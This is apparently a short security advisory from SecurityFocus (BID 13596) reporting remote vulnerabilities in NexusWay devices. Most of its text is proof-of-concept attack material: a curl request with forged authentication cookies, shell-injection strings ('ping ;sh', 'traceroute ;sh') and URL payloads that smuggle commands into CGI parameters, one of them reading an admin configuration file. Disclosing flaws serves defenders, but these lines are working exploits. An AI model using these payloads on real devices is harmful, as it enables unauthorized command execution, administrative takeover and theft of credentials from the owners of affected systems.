source: https://www.securityfocus.com/bid/13596/info
NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an affected device.
All versions of NexusWay are considered vulnerable at the moment.
# curl -k -b 'cyclone500_write=1; cyclone500_auth=1;
client_ip1;client=0.0.0.0' https://www.example.com/index.cgi
ping ;sh
traceroute ;sh
https://www.example.com/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
https://www.example.com/ping.cgi?ip=localhost%26%26touch+/tmp/test
